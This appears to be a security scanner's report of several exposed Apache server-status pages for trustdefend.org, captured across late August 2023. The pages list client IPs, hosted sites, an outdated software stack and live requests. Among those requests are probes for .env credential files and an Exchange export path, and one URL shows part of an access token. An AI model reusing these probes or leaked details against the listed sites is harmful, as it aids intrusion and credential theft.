      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-758232840/309/1708363W
      0.52000.024.4087530.23
      95.108.213.120roxel-pro.ru:8080GET / HTTP/1.0
      
      1-758126500/6/1697521W
      0.0133300.00.1786786.02
      185.240.102.28over-shop.ru:8080GET /index.php?route=extension/module/syncms/SyncImage&cron= HT
      
      2-7587100/21/1676532_
      0.0304330.00.5786365.04
      213.180.203.52mebozon.ru:8080GET /divan-aristokrat-ferra-sendi HTTP/1.0
      
      3-758325080/17/1639423W
      0.031900.03.2685091.26
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      4-75811630/4/1634061_
      0.0005620.00.2084174.21
      213.180.203.42mebozon.ru:8080GET /pryamye-divany/kuhonnyj-divan-bali-velvet-barhat-red HTTP/
      
      5-758325750/20/1594170_
      0.03010.00.3381680.25
      213.180.203.57vidook.ru:8080GET /error404/ HTTP/1.0
      
      6-75811890/5/1577526_
      0.00012200.00.1480223.65
      66.249.72.132den35.ru:8080GET /product.php?z/P957940 HTTP/1.0
      
      7-758265050/181/1549947W
      0.29000.05.7978616.48
      14.18.110.73porscheville.ru:8080GET /?author=6 HTTP/1.0
      
      8-758210510/379/1519554_
      0.54000.065.4778134.78
      176.102.79.234hard.line.pm:8080GET /null HTTP/1.0
      
      9-75811900/4/1503199_
      0.0205520.00.1878386.68
      95.108.213.172mebozon.ru:8080GET /stenka-monakko-glyantsevyj-mdf HTTP/1.0
      
      10-758228150/460/1487393W
      0.683000.011.9476393.48
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      11-7583740/45/1451650_
      0.07000.00.9675690.79
      64.227.126.135185.240.102.32:8080GET /.env HTTP/1.0
      
      12-758307800/114/1414696W
      0.25200.03.1973363.43
      66.249.66.165clublz.ru:8080GET /simple-dishes-for-halloween/ HTTP/1.0
      
      13-758297850/103/1375949_
      0.20050.06.0368734.83
      185.211.158.108chuvanova.com:8080GET /wp-content/plugins/wp-testing/vendor/samyk/evercookie/php/
      
      14-758228240/479/1332644_
      0.7402540.015.2568482.95
      85.140.25.80mintim.ru:8080GET /api.php/shop.order.search?access_token=a17a94ea7c715a35633
      
      15-758172700/685/1295258_
      1.060110.033.9367331.63
      196.61.108.135app-findmy.pm:8080GET /style_avatars HTTP/1.0
      
      16-758288190/123/1250375_
      0.20060.03.8065519.26
      86.103.33.137hard.line.pm:8080GET /go.php?link=0 HTTP/1.0
      
      17-7586460/34/1218538_
      0.060230.00.9063172.27
      24.203.25.98jenny.linkpc.net:8080GET / HTTP/1.0
      
      18-758314390/88/1148426W
      0.15400.02.6359495.74
      85.140.25.80mintim.ru:8080GET /wa-data/public/shop/products/39/10/21039/images/21902/2190
      
      19-75812180/24/1098978_
      0.040220.00.6858435.41
      195.39.75.89jenny.linkpc.net:8080GET / HTTP/1.0
      
      20-7587130/34/1034086W
      0.05300.00.8353762.29
      85.140.25.80mintim.ru:8080GET /wa-data/public/shop/products/65/28/22865/images/26796/2679
      
      21-758316710/55/992955W
      0.10000.01.4551185.55
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      22-758197380/528/936925W
      0.851900.048.2749391.47
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      23-758316720/120/874249W
      0.18000.02.5346247.80
      5.255.231.136musicinfonews.site:8080GET /death-metal/oni-incantation-superstition-2023/ HTTP/1.0
      
      24-75812191/10/836315C
      0.02000.30.2042901.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-75812220/2/781698W
      0.00000.01.3441594.59
      128.0.137.47taroclass.ru:8080GET /shkoly-obuchenya-taro/?ysclid=lm3n9kp0kx194532003 HTTP/1.0
      
      26-75812240/10/737948_
      0.0201400.00.8140199.71
      85.140.25.80mintim.ru:8080GET /api.php/shop.order.search?access_token=a17a94ea7c715a35633
      
      27-75813030/4/689173_
      0.00080.00.0236125.46
      185.211.158.108chuvanova.com:8080GET /wp-content/plugins/wp-testing/vendor/samyk/evercookie/php/
      
      28-75813060/3/659902_
      0.00060.00.0134505.30
      178.212.32.177jenny.linkpc.net:8080GET /go.php?link=0 HTTP/1.0
      
      29-75813080/2/636130_
      0.0005550.00.2533297.47
      213.180.203.218mebozon.ru:8080GET /uglovye-divany/divan-uglovoj-migel-plyush-shokolad HTTP/1.
      
      30-75813140/2/591173W
      0.00000.00.0530071.00
      95.108.213.103fulcanelli.moscow:8080GET / HTTP/1.0
      
      31-75813170/17/564835_
      0.02070.01.2528837.79
      
      Found on 2023-09-03 16:05
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb429b20c29f

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Thursday, 31-Aug-2023 18:52:40 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 658
      Parent Server MPM Generation: 657
      Server uptime:  13 days 6 hours 42 minutes 46 seconds
      Server load: 6.27 7.21 7.71
      Total accesses: 42446219 - Total Traffic: 2103.3 GB
      CPU Usage: u61.03 s17.23 cu0 cs0 - .00682% CPU load
      37 requests/sec - 1.9 MB/second - 52.0 kB/request
      10 requests currently being processed, 10 idle workers
      __WWW____WW_WW_W_W..._W.........................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-657304490/51/1404465_
      0.0901090.02.1970068.68
      213.180.203.103videoshok.ru:8080GET /%D0%9E%D0%B1%D0%B7%D0%BE%D1%80+%D0%BC%D0%B0%D1%82%D1%87%D0
      
      1-657294060/105/1399147_
      0.170150.04.7369873.16
      93.159.238.202ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      2-657304730/38/1384271W
      0.06800.01.0670129.52
      185.253.102.142budetpolza.ru:8080GET /index.php?route=extension/feed/ocext_feed_generator_google
      
      3-657222660/336/1349698W
      0.742200.015.4269370.32
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      4-657281220/28/1348360W
      0.054800.00.6768622.88
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      5-657299400/69/1319293_
      0.110580.02.3166382.63
      122.155.174.181jenny.linkpc.net:8080GET / HTTP/1.0
      
      6-657305790/52/1301234_
      0.13070.02.8064905.30
      191.103.116.146hard.line.pm:8080GET /sloth_out.php HTTP/1.0
      
      7-657305410/48/1278732_
      0.070130.01.6664148.73
      93.159.238.202ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      8-657305810/46/1255401_
      0.0801130.03.0963315.13
      5.45.207.185videoshok.ru:8080GET /%D0%BA%D0%B0%D0%BA%2B%D0%BB%D0%B5%D0%B3%D0%BA%D0%BE%2B%D0%
      
      9-657281580/153/1243879W
      0.23800.05.5663960.64
      213.180.203.155tcpanorama.by:8080GET / HTTP/1.0
      
      10-657310200/8/1225577W
      0.01300.00.3261869.93
      5.45.207.185videoshok.ru:8080GET /%D0%9F%D1%80%D1%8F%D0%BC%D0%BE%D0%B9+%D1%8D%D1%84%D0%B8%D1
      
      11-657311420/9/1202191_
      0.0101100.00.6860955.79
      213.180.203.163videoshok.ru:8080GET /%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D1%80%D0%B5%D0%B3%D0%B8%D1%
      
      12-657312500/3/1161735W
      0.00000.00.1059682.61
      95.108.213.171videoshok.ru:8080GET /%D1%84%D0%B0%D0%BA%D0%B5%D0%BB HTTP/1.0
      
      13-657214000/185/1135516W
      0.35400.08.9855806.97
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      14-657312890/2/1100863_
      0.000570.00.0755326.69
      31.0.48.246hard.line.pm:8080GET / HTTP/1.0
      
      15-657245580/284/1073642W
      0.54000.020.5655197.84
      128.199.62.55trustdefend.org:8080GET /server-status HTTP/1.0
      
      16-657312900/1/1037626_
      0.000150.00.0053838.90
      89.19.216.136ds-hikvision.ru:8080POST /metrika/sendInfo/ HTTP/1.0
      
      17-657232990/195/1011952W
      0.31700.09.0351555.89
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      18-657-0/0/950039.
      0.432500.00.0048228.04
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-657-0/0/913475.
      0.016800.00.0047340.87
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-657-0/0/858175.
      0.017600.00.0043859.69
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-657282100/140/833692_
      0.27000.07.3142258.97
      128.199.62.55trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      22-657282110/136/781940W
      0.22200.07.3840794.83
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      23-657-0/0/731593.
      0.026500.00.0037464.96
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-657-0/0/701736.
      0.085700.00.0035711.43
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-657-0/0/661882.
      0.142800.00.0034681.06
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-657-0/0/628188.
      0.121500.00.0033766.94
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-657-0/0/587176.
      0.016900.00.0030474.71
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-657-0/0/556729.
      0.026400.00.0029058.43
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-657-0/0/539798.
      0.1124100.00.0027778.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-657-0/0/505765.
      0.506300.00.0025313.02
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-657-0/0/480900.
      0.0328000.00.0024177.93
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-657-0/0/451341.
      0.0527900.00.0023239.99
      127.0.0.1185.240.102.32:8080
      Found on 2023-08-31 15:52
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb424303d191

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Wednesday, 30-Aug-2023 05:28:31 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 579
      Parent Server MPM Generation: 578
      Server uptime:  11 days 17 hours 18 minutes 38 seconds
      Server load: 8.94 9.28 9.33
      Total accesses: 38159676 - Total Traffic: 1859.2 GB
      CPU Usage: u35.79 s9.56 cu0 cs0 - .00448% CPU load
      37.7 requests/sec - 1.9 MB/second - 51.1 kB/request
      21 requests currently being processed, 6 idle workers
      W_W_W.W.WW.._WWWWWWW.WW._WWW.__.WW..W...........................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-57855740/103/1250052W
      0.166400.03.4660970.23
      87.250.224.210naviglon.ru:8080GET /products_new.php?action=wishlist_now&BUYproducts_id=11792 
      
      1-578199630/144/1241410_
      0.2101060.010.3061075.65
      187.189.240.236jenny.linkpc.net:8080GET / HTTP/1.0
      
      2-578280440/96/1232559W
      0.1428200.02.1260931.44
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      3-578115470/27/1203181_
      0.03000.00.7760238.45
      187.137.65.82hard.line.pm:8080GET /ps/CoUNnq.js HTTP/1.0
      
      4-57868500/148/1199397W
      0.32100.020.3560168.09
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      5-578-0/0/1171526.
      0.01500.00.0057552.11
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      6-57896020/1/1160352W
      0.006300.00.0056663.63
      87.250.224.224naviglon.ru:8080GET /product_info.php?products_id=5495 HTTP/1.0
      
      7-578-0/0/1136808.
      0.041000.00.0055991.91
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      8-57858410/223/1115137W
      0.36100.09.7455162.65
      78.107.252.54slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      9-57868990/95/1105613W
      0.17700.07.7555587.70
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      10-578-0/0/1087891.
      0.02900.00.0053837.57
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-578-0/0/1072092.
      0.08800.00.0053603.71
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-578300270/256/1027211_
      0.4303410.06.2352042.44
      109.248.15.53ldk-sokol.ru:8080GET /sokolskij-rajon HTTP/1.0
      
      13-578321900/306/1009001W
      0.55000.017.2148635.57
      5.255.231.83legomebel.com.ua:8080GET /p967251701-matras-zhakkard-universal.html HTTP/1.0
      
      14-578117900/39/979754W
      0.05000.00.9048175.47
      185.240.102.28cescorus.ru:8080POST /wp-admin/admin-ajax.php?action=as_async_request_queue_run
      
      15-578117910/26/953178W
      0.03200.00.5448020.73
      80.78.240.111intelspro.ru:8080POST /gw/ HTTP/1.0
      
      16-578117940/31/922272W
      0.06200.01.9746748.95
      80.78.240.111slashfocus.ru:8080POST /gw/ HTTP/1.0
      
      17-57886350/114/898573W
      0.17600.04.7745046.01
      185.240.102.28cescorus.ru:8080POST /wp-admin/admin-ajax.php?action=as_async_request_queue_run
      
      18-57899890/40/847857W
      0.05300.01.1342390.28
      185.240.102.28cescorus.ru:8080POST /wp-admin/admin-ajax.php?action=as_async_request_queue_run
      
      19-578314510/327/810773W
      0.55000.019.6540847.93
      5.157.61.153kalitkatomsk.ru:8080GET /mezhkomnatnye-dveri/107-krona/175-laura-do-chernyj-triplek
      
      20-578-0/0/764606.
      0.03600.00.0038496.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-57899900/57/743957W
      0.161100.02.2337270.02
      20.15.240.106zimag.ru:8080GET /svetodiodnye-konsoli/svetodiodnye-peretyazhki/svetodiodnay
      
      22-578322290/197/695153W
      0.351100.019.9935523.18
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      23-578-0/0/648777.
      0.11400.00.0032918.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-578253180/362/626132_
      0.65060.045.0131404.80
      181.61.204.234next.run.place:8080GET /go.php HTTP/1.0
      
      25-57829470/13/587992W
      0.0117200.00.2830432.73
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      26-578173300/267/561819W
      0.4133700.020.5430000.85
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      27-57829480/208/525828W
      0.33000.011.4226627.45
      142.93.153.3trustdefend.org:8080GET /server-status HTTP/1.0
      
      28-578-0/0/494839.
      0.06300.00.0025494.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-578104670/69/484305_
      0.11000.03.8424360.18
      158.46.66.49blue-issyk-kul.ru:8080GET /%D0%A1%D0%B0%D0%B9%D1%82_blue-issyk-kul.ru_%D0%BE%D1%82_19
      
      30-578104680/105/455825_
      0.190590.02.8022489.61
      51.75.169.47hard.line.pm:8080GET / HTTP/1.0
      
      31-578-0/0/436432.
      0.01000.00.0021782.89
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-578120550/20/408354W
      Found on 2023-08-30 02:28
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb424ada7824

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Tuesday, 29-Aug-2023 02:16:48 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 505
      Parent Server MPM Generation: 504
      Server uptime:  10 days 14 hours 6 minutes 55 seconds
      Server load: 6.12 7.06 7.34
      Total accesses: 34790372 - Total Traffic: 1698.3 GB
      CPU Usage: u39.79 s10.79 cu0 cs0 - .00553% CPU load
      38 requests/sec - 1.9 MB/second - 51.2 kB/request
      21 requests currently being processed, 7 idle workers
      W_WWWWWWW_W__WWW._WW_WWWWW.W_.......W...........................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      
      
      <SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-50414620/34/1135200W
      0.0513300.01.1455342.67
      45.135.33.10naviglon.ru:8080GET /index.php?cat=5 HTTP/1.0
      
      1-50478900/80/1129295_
      0.1102940.01.3455636.76
      149.202.98.187xf-forum.ru:8080GET /index.php?chat/update&users%5B1%5D=&channel=room&room_id=1
      
      2-504236250/307/1126063W
      0.4714900.016.9555559.52
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      3-50467010/423/1095577W
      0.65000.012.8354769.66
      139.144.150.23trustdefend.org:8080GET /server-status HTTP/1.0
      
      4-504223850/54/1093456W
      0.0832000.04.9654804.31
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      5-504251250/75/1065928W
      0.0925900.02.0251927.63
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      6-504304190/273/1055565W
      0.439400.08.1151292.59
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      7-504276590/268/1034707W
      0.369600.010.7150943.75
      95.108.213.83naviglon.ru:8080GET / HTTP/1.0
      
      8-504308760/120/1014657W
      0.1715700.03.0449733.18
      5.45.207.183naviglon.ru:8080GET / HTTP/1.0
      
      9-50447100/205/1006581_
      0.26010240.09.7850567.53
      37.19.200.25khochu-prodat.ru:8080GET /alist.php HTTP/1.0
      
      10-50420210/266/991179W
      0.353900.07.9348955.88
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      11-50460230/158/975688_
      0.22000.07.8748922.41
      50.83.178.111jenny.linkpc.net:8080GET /ps/CoUNnq.js HTTP/1.0
      
      12-50440490/271/933907_
      0.3901180.08.6047351.22
      62.118.85.137systema-gorod.ru:8080GET /https;/main.travelfornamewalking.ga/-https;-main.travelfor
      
      13-50491900/15/917317W
      0.02000.00.2844107.31
      178.176.78.77scooter-ani.ru:8080POST /signup/ HTTP/1.0
      
      14-504284000/371/894307W
      0.511900.018.5143879.44
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      15-504277100/541/866355W
      0.761100.027.6943504.78
      78.107.252.54intelspro.ru:8080POST /gw/ HTTP/1.0
      
      16-504-0/0/839523.
      0.041100.00.0042549.25
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-50420860/143/820833_
      0.200670.07.9341336.83
      50.83.178.111jenny.linkpc.net:8080GET / HTTP/1.0
      
      18-50449640/118/770795W
      0.16000.04.2938533.13
      79.116.135.162next.run.place:8080GET / HTTP/1.0
      
      19-50450040/222/738100W
      0.34000.014.0637281.88
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      20-504112640/507/699002_
      0.7101150.023.0435004.99
      172.172.16.103ml-dom.ru:8080GET /web HTTP/1.0
      
      21-50420870/38/681375W
      0.0410600.02.3934007.86
      81.163.46.181naviglon.ru:8080GET /product_info.php?products_id=2528 HTTP/1.0
      
      22-504287320/23/638149W
      0.0321600.00.8832780.00
      95.108.213.132naviglon.ru:8080GET / HTTP/1.0
      
      23-504267060/98/595637W
      0.1224000.02.8730230.56
      188.170.195.79naviglon.ru:8080GET /product_info.php?products_id=13170 HTTP/1.0
      
      24-504287330/60/573704W
      0.0920400.02.1429048.48
      23.105.238.220naviglon.ru:8080GET /vamshop-1c.php?wc1c=exchange?type=catalog&mode=import&file
      
      25-50420880/283/544913W
      0.402300.09.4728150.96
      87.250.224.218naviglon.ru:8080GET / HTTP/1.0
      
      26-504-0/0/517791.
      0.065500.00.0027813.58
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-50450700/88/486079W
      0.113100.09.1824583.74
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      28-50450710/113/457930_
      0.16000.03.8223661.51
      139.144.150.23teleg-autoritwebstor.online:808GET /login.action HTTP/1.0
      
      29-504-0/0/448508.
      0.576200.00.0022649.68
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-504-0/0/420249.
      0.096300.00.0020673.04
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-504-0/0/404139.
      0.018400.00.0020300.62
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      Found on 2023-08-28 23:16
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb426bbcfbf3

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Monday, 28-Aug-2023 00:59:10 MSK
      Restart Time: Friday, 18-Aug-2023 12:09:53 MSK
      Parent Server Config. Generation: 457
      Parent Server MPM Generation: 456
      Server uptime:  9 days 12 hours 49 minutes 16 seconds
      Server load: 10.67 9.62 9.56
      Total accesses: 31290710 - Total Traffic: 1552.2 GB
      CPU Usage: u48.93 s12.4 cu0 cs0 - .00745% CPU load
      38 requests/sec - 1.9 MB/second - 52.0 kB/request
      8 requests currently being processed, 10 idle workers
      W__WWWWW_W_____..W._............._..............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
